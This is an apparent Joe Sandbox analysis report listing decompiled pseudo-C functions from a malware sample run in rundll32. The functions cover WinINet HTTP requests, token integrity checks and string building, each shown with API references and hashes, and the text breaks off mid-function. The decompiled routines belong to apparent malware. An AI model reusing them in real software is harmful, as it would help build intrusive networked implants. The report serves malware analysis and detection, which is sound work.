                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                    • String ID:
                    • API String ID: 1814172918-0
                    • Opcode ID: db137f92992da9a36f80b1a3309cd0be9c209e76741c8c3db864ee487bd5274c
                    • Instruction ID: 265996a1203513a4a028c6b84838c6b6ffbfd15e78a47dcd33149af27ae166e3
                    • Opcode Fuzzy Hash: db137f92992da9a36f80b1a3309cd0be9c209e76741c8c3db864ee487bd5274c
                    • Instruction Fuzzy Hash: CA21A5B2710214BBD711AF68DC49F9A77F9EBA4750F250121F609E71A0DF70AA45CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04215622 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 93%
                    			E04215622(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E04215867(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E042117AB(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E042117AB(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E042117AB(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E042117AB(_t46);
				}
				return _t24;
			}












                    0x04215622
                    0x04215622
                    0x04215624
                    0x04215626
                    0x0421562d
                    0x04215634
                    0x04215634
                    0x04215639
                    0x0421563e
                    0x04215645
                    0x0421564c
                    0x04215650
                    0x04215655
                    0x04215655
                    0x04215657
                    0x0421565c
                    0x04215660
                    0x04215665
                    0x04215665
                    0x04215667
                    0x0421566c
                    0x04215670
                    0x04215675
                    0x04215675
                    0x04215677
                    0x04215682
                    0x04215685
                    0x04215685
                    0x04215687
                    0x0421568c
                    0x0421568f
                    0x0421568f
                    0x04215691
                    0x04215698
                    0x0421569b
                    0x042156a0
                    0x042156a3
                    0x042156a3
                    0x042156a6
                    0x042156ab
                    0x042156ae
                    0x042156ae
                    0x042156b3
                    0x042156b7
                    0x042156ba
                    0x042156ba
                    0x042156bf
                    0x042156c4
                    0x00000000
                    0x042156c7
                    0x042156ce

                    APIs
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04215650
                    • InternetCloseHandle.WININET(?), ref: 04215655
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04215660
                    • InternetCloseHandle.WININET(?), ref: 04215665
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04215670
                    • InternetCloseHandle.WININET(?), ref: 04215675
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04211B44,?,?,00000000,00000000,74E481D0), ref: 04215685
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04211B44,?,?,00000000,00000000,74E481D0), ref: 0421568F
                      • Part of subcall function 04215867: WaitForMultipleObjects.KERNEL32(00000002,04217AF8,00000000,04217AF8,?,?,?,04217AF8,0000EA60), ref: 04215882
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                    • String ID:
                    • API String ID: 2824497044-0
                    • Opcode ID: 2210e28aeb01d0da6667b19c3fc991b019a009c51e0f606940b36d6f5abe4e1d
                    • Instruction ID: d56ed2a1c8595c8525bac34e12203a509c76ed07b57b83658887430aeeb9ec9f
                    • Opcode Fuzzy Hash: 2210e28aeb01d0da6667b19c3fc991b019a009c51e0f606940b36d6f5abe4e1d
                    • Instruction Fuzzy Hash: A1116D717207896BC630AEAAEC84C2BB7F9ABA43443590D58E186D3560C735F8858AA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042113CF Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E042113CF(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x421a2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E042163FD(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E042117AB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                    0x042113dc
                    0x042113e3
                    0x042113ea
                    0x042113fe
                    0x04211409
                    0x04211421
                    0x0421142e
                    0x04211431
                    0x04211436
                    0x04211441
                    0x04211445
                    0x04211454
                    0x04211458
                    0x04211474
                    0x04211474
                    0x04211478
                    0x04211478
                    0x0421147d
                    0x04211481
                    0x04211487
                    0x04211488
                    0x0421148f
                    0x04211495

                    APIs
                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04211401
                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04211421
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04211431
                    • CloseHandle.KERNEL32(00000000), ref: 04211481
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04211454
                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0421145C
                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0421146C
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                    • String ID:
                    • API String ID: 1295030180-0
                    • Opcode ID: cd4e3e19a5ce8b6859f9624bf3c6016326b754101e23ca253da8ddf003c4ef3a
                    • Instruction ID: 1d7c2437730adae20ea1134b77aebc9c59bff012f90e15c9577d6e3fd853ffd9
                    • Opcode Fuzzy Hash: cd4e3e19a5ce8b6859f9624bf3c6016326b754101e23ca253da8ddf003c4ef3a
                    • Instruction Fuzzy Hash: 44215C75A00209FFEB109FA4DC48EFEBBB9EF58704F0040A5E610A6260DB755E50DB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042118BA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 64%
                    			E042118BA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x421a320; // 0x87d5a8
				_t1 = _t9 + 0x421b62c; // 0x253d7325
				_t36 = 0;
				_t28 = E042161A7(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t40 = E042163FD(_v8 +  *_t39(_a4) + 1);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E04217885(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E042117AB(_t40);
						_t42 = E04216863(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E042117AB(_t36);
							_t36 = _t42;
						}
						_t43 = E04215ACD(_t36, _t33);
						if(_t43 != 0) {
							E042117AB(_t36);
							_t36 = _t43;
						}
					}
					E042117AB(_t28);
				}
				return _t36;
			}
















                    0x042118ba
                    0x042118bd
                    0x042118be
                    0x042118c5
                    0x042118cc
                    0x042118d3
                    0x042118d7
                    0x042118de
                    0x042118e5
                    0x042118ea
                    0x042118fc
                    0x04211900
                    0x04211904
                    0x0421190a
                    0x0421190f
                    0x04211919
                    0x0421191f
                    0x04211921
                    0x04211938
                    0x0421193c
                    0x0421193f
                    0x04211944
                    0x04211944
                    0x0421194d
                    0x04211951
                    0x04211954
                    0x04211959
                    0x04211959
                    0x04211951
                    0x0421195c
                    0x04211961
                    0x04211967

                    APIs
                      • Part of subcall function 042161A7: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,042118D3,253D7325,00000000,7691C740,?,?,04216ABB,?,04A995B0), ref: 0421620E
                      • Part of subcall function 042161A7: sprintf.NTDLL ref: 0421622F
                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04216ABB,?,04A995B0), ref: 042118E5
                    • lstrlen.KERNEL32(?,?,?,04216ABB,?,04A995B0), ref: 042118ED
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • strcpy.NTDLL ref: 04211904
                    • lstrcat.KERNEL32(00000000,?), ref: 0421190F
                      • Part of subcall function 04217885: lstrlen.KERNEL32(?,?,?,00000000,?,0421191E,00000000,?,?,?,04216ABB,?,04A995B0), ref: 04217896
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04216ABB,?,04A995B0), ref: 0421192C
                      • Part of subcall function 04216863: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04211938,00000000,?,?,04216ABB,?,04A995B0), ref: 0421686D
                      • Part of subcall function 04216863: _snprintf.NTDLL ref: 042168CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                    • String ID: =
                    • API String ID: 2864389247-1428090586
                    • Opcode ID: 35114498bfbb01c698c28f4c7776a9222cb6bb15f2330ebae0c209a2bdd08f79
                    • Instruction ID: 153be2904bd9fe723a7bf32eae85a45d5156fcdb293f71b6ad92708cae2b9ff4
                    • Opcode Fuzzy Hash: 35114498bfbb01c698c28f4c7776a9222cb6bb15f2330ebae0c209a2bdd08f79
                    • Instruction Fuzzy Hash: C211CA77B211257797127778AC84C7E36FD9FB9A543090465F601A7220DF74ED0287E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04211E51 Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 341 4211e51-4211e9d SysAllocString 342 4211fc1-4211fc4 341->342 343 4211ea3-4211ecf 341->343 344 4211fc6-4211fc9 SafeArrayDestroy 342->344 345 4211fcf-4211fd2 342->345 349 4211ed5-4211ee1 call 42156cf 343->349 350 4211fbe 343->350 344->345 347 4211fd4-4211fd7 SysFreeString 345->347 348 4211fdd-4211fe4 345->348 347->348 349->350 353 4211ee7-4211ef7 349->353 350->342 353->350 355 4211efd-4211f23 IUnknown_QueryInterface_Proxy 353->355 355->350 357 4211f29-4211f3d 355->357 359 4211f7b-4211f7e 357->359 360 4211f3f-4211f42 357->360 362 4211f80-4211f85 359->362 363 4211fb5-4211fba 359->363 360->359 361 4211f44-4211f5b StrStrIW 360->361 364 4211f72-4211f75 SysFreeString 361->364 365 4211f5d-4211f66 call 4213d67 361->365 362->363 366 4211f87-4211f92 call 42157a8 362->366 363->350 364->359 365->364 371 4211f68-4211f70 call 42156cf 365->371 370 4211f97-4211f9b 366->370 370->363 372 4211f9d-4211fa2 370->372 371->364 374 4211fb0 372->374 375 4211fa4-4211fae 372->375 374->363 375->363
                    APIs
                    • SysAllocString.OLEAUT32(?), ref: 04211E92
                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04211F14
                    • StrStrIW.SHLWAPI(?,006E0069), ref: 04211F53
                    • SysFreeString.OLEAUT32(?), ref: 04211F75
                      • Part of subcall function 04213D67: SysAllocString.OLEAUT32(04219290), ref: 04213DB7
                    • SafeArrayDestroy.OLEAUT32(?), ref: 04211FC9
                    • SysFreeString.OLEAUT32(?), ref: 04211FD7
                      • Part of subcall function 042156CF: Sleep.KERNEL32(000001F4), ref: 04215717
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                    • String ID:
                    • API String ID: 2118684380-0
                    • Opcode ID: fb092065dcffaf83682a428bad839051f6614b1aba707e9989efb6dd05bbc638
                    • Instruction ID: 3a451b0f04dfc470f79d740c7ee77002e4895aba897db6c86ab834298f553f26
                    • Opcode Fuzzy Hash: fb092065dcffaf83682a428bad839051f6614b1aba707e9989efb6dd05bbc638
                    • Instruction Fuzzy Hash: 7F515172A10209EFCB10DFA8C8848AEF7F6FF98340B148968F615DB220DB75AD55CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042143D8 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 377 42143d8-42143e7 378 42143e9-42143f9 call 421395b 377->378 379 42143fb-42143ff call 4217a34 377->379 378->379 384 421444a GetLastError 378->384 383 4214404-4214406 379->383 385 4214445-4214448 383->385 386 4214408-421442d ResetEvent * 2 HttpSendRequestA 383->386 389 421444c-421444e 384->389 385->384 385->389 387 421443a-421443d SetEvent 386->387 388 421442f-4214436 GetLastError 386->388 391 4214443 387->391 388->385 390 4214438 388->390 390->391 391->385
                    C-Code - Quality: 100%
                    			E042143D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E0421395B(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04217A34(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                    0x042143d8
                    0x042143e5
                    0x042143e7
                    0x0421444a
                    0x00000000
                    0x0421444a
                    0x042143ff
                    0x04214406
                    0x04214412
                    0x04214417
                    0x0421442d
                    0x0421443d
                    0x00000000
                    0x0421442f
                    0x0421442f
                    0x04214436
                    0x04214443
                    0x04214443
                    0x04214443
                    0x04214436
                    0x0421442d
                    0x04214448
                    0x00000000
                    0x00000000
                    0x0421444e

                    APIs
                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04211AE3,?,?,00000000,00000000), ref: 04214412
                    • ResetEvent.KERNEL32(?), ref: 04214417
                    • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04214424
                    • GetLastError.KERNEL32 ref: 0421442F
                    • GetLastError.KERNEL32(?,?,00000102,04211AE3,?,?,00000000,00000000), ref: 0421444A
                      • Part of subcall function 0421395B: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,042143F7,?,?,?,?,00000102,04211AE3,?,?,00000000), ref: 04213967
                      • Part of subcall function 0421395B: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,042143F7,?,?,?,?,00000102,04211AE3,?), ref: 042139C5
                      • Part of subcall function 0421395B: lstrcpy.KERNEL32(00000000,00000000), ref: 042139D5
                    • SetEvent.KERNEL32(?), ref: 0421443D
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                    • String ID:
                    • API String ID: 3739416942-0
                    • Opcode ID: 9eef42432477dff6245eae06b55a90fdf169cfe2560780d74eb95346461ea8f9
                    • Instruction ID: fd509f1228e95dd242d409a0a8f1f809a95913eba4bc8f78628290cd603a56bd
                    • Opcode Fuzzy Hash: 9eef42432477dff6245eae06b55a90fdf169cfe2560780d74eb95346461ea8f9
                    • Instruction Fuzzy Hash: 3601AD31324201AAEB307E25EC48F5BB6E8EFA4728F644625F599920F0DB20F944DA52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04213A12 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 392 4213a12-4213a57 wsprintfA 393 4213a59-4213a61 RtlAllocateHeap 392->393 394 4213a7b-4213a83 RtlAllocateHeap 392->394 395 4213aa0 393->395 396 4213a63-4213a74 call 4212fc4 393->396 394->395 397 4213a85-4213a96 call 42168eb 394->397 400 4213aa7-4213aab 395->400 401 4213a79 396->401 402 4213a9b-4213a9e 397->402 403 4213ae5 400->403 404 4213aad-4213ac8 call 42152a9 call 4214dc8 400->404 401->402 402->400 406 4213aeb-4213af2 403->406 410 4213af5-4213b06 404->410 411 4213aca-4213ad9 call 4215f6a 404->411 410->406 413 4213b08-4213b0f 410->413 411->403 413->406
                    C-Code - Quality: 65%
                    			E04213A12(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t37;
				void* _t38;
				intOrPtr* _t43;
				void* _t44;
				void* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t51;

				_t48 = __edx;
				_t44 = __ecx;
				_t43 = _a16;
				_t49 = __eax;
				_t22 =  *0x421a320; // 0x87d5a8
				_t2 = _t22 + 0x421b682; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
				_t51 =  *0x421a3e0; // 0x4a99b60
				_push(0x800);
				_push(0);
				_push( *0x421a2d8);
				if( *0x421a2ec >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_a4 = 8;
						L7:
						if(_a4 != 0) {
							L10:
							 *0x421a2ec =  *0x421a2ec + 1;
							L11:
							return _a4;
						}
						_t52 = _a16;
						 *_t49 = _a16;
						_t50 = _v8;
						 *_t43 = E042152A9(_t52, _t50); // executed
						_t30 = E04214DC8(_t50, _t52); // executed
						if(_t30 != 0) {
							 *_a8 = _t50;
							 *_a12 = _t30;
							if( *0x421a2ec < 5) {
								 *0x421a2ec =  *0x421a2ec & 0x00000000;
							}
							goto L11;
						}
						_a4 = 0xbf;
						E04215F6A();
						RtlFreeHeap( *0x421a2d8, 0, _t50); // executed
						goto L10;
					}
					_t37 = E042168EB(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
					L5:
					_a4 = _t37;
					goto L7;
				}
				_t38 = RtlAllocateHeap(); // executed
				if(_t38 == 0) {
					goto L6;
				}
				_t37 = E04212FC4(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38); // executed
				goto L5;
			}
















                    0x04213a12
                    0x04213a12
                    0x04213a19
                    0x04213a20
                    0x04213a24
                    0x04213a29
                    0x04213a34
                    0x04213a3a
                    0x04213a4a
                    0x04213a4f
                    0x04213a51
                    0x04213a57
                    0x04213a83
                    0x04213aa0
                    0x04213aa0
                    0x04213aa7
                    0x04213aab
                    0x04213ae5
                    0x04213ae5
                    0x04213aeb
                    0x04213af2
                    0x04213af2
                    0x04213aad
                    0x04213ab0
                    0x04213ab2
                    0x04213abf
                    0x04213ac1
                    0x04213ac8
                    0x04213aff
                    0x04213b04
                    0x04213b06
                    0x04213b08
                    0x04213b08
                    0x00000000
                    0x04213b06
                    0x04213aca
                    0x04213ad1
                    0x04213adf
                    0x00000000
                    0x04213adf
                    0x04213a96
                    0x04213a9b
                    0x04213a9b
                    0x00000000
                    0x04213a9b
                    0x04213a59
                    0x04213a61
                    0x00000000
                    0x00000000
                    0x04213a74
                    0x00000000

                    APIs
                    • wsprintfA.USER32 ref: 04213A34
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04213A59
                      • Part of subcall function 04212FC4: GetTickCount.KERNEL32 ref: 04212FD8
                      • Part of subcall function 04212FC4: wsprintfA.USER32 ref: 04213028
                      • Part of subcall function 04212FC4: wsprintfA.USER32 ref: 04213045
                      • Part of subcall function 04212FC4: wsprintfA.USER32 ref: 04213065
                      • Part of subcall function 04212FC4: wsprintfA.USER32 ref: 04213091
                      • Part of subcall function 04212FC4: HeapFree.KERNEL32(00000000,00000000), ref: 042130A3
                      • Part of subcall function 04212FC4: wsprintfA.USER32 ref: 042130C4
                      • Part of subcall function 04212FC4: HeapFree.KERNEL32(00000000,00000000), ref: 042130D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04213A7B
                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 04213ADF
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: wsprintf$Heap$Free$Allocate$CountTick
                    • String ID: Ut
                    • API String ID: 1428766365-8415677
                    • Opcode ID: 15a5832409fd27e5a3550a775ad51199e17e259ec0b9df063d1ecb5978f8a118
                    • Instruction ID: 2dbf83d9de604fcffbf07d548107db65205209cfdc7234f921ba7c8b5655f9f8
                    • Opcode Fuzzy Hash: 15a5832409fd27e5a3550a775ad51199e17e259ec0b9df063d1ecb5978f8a118
                    • Instruction Fuzzy Hash: 42315E76711109EBDB01DFA8E888EDA7BFDFB28354F108012F905E7260DB75A944CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04211000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 50%
                    			E04211000(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x421a3cc; // 0x4a995b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x421a3cc; // 0x4a995b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x421a030) {
					HeapFree( *0x421a2d8, 0, _t8);
				}
				_t9 = E04213B61(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x421a3cc; // 0x4a995b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                    0x04211000
                    0x04211000
                    0x04211009
                    0x04211019
                    0x04211019
                    0x0421101e
                    0x04211023
                    0x00000000
                    0x00000000
                    0x04211013
                    0x04211013
                    0x04211025
                    0x04211029
                    0x0421103b
                    0x0421103b
                    0x04211046
                    0x0421104b
                    0x0421104e
                    0x04211053
                    0x04211057
                    0x0421105d

                    APIs
                    • RtlEnterCriticalSection.NTDLL(04A99570), ref: 04211009
                    • Sleep.KERNEL32(0000000A), ref: 04211013
                    • HeapFree.KERNEL32(00000000,00000000), ref: 0421103B
                    • RtlLeaveCriticalSection.NTDLL(04A99570), ref: 04211057
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: 92cac9a9d4d8ae6efd7c7ddbde134c06a5e968cd69e5dbd82fcb44660876da2b
                    • Instruction ID: d3d91acb27cfab9f86eb7ca8465ee77016392034913fbc55798ede703ff76a85
                    • Opcode Fuzzy Hash: 92cac9a9d4d8ae6efd7c7ddbde134c06a5e968cd69e5dbd82fcb44660876da2b
                    • Instruction Fuzzy Hash: 40F0DAB0B112529BEB209B6DEC4DF267BE4EB34744B048415F905D6171DA38EC90DA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04216535 Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 57%
                    			E04216535(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
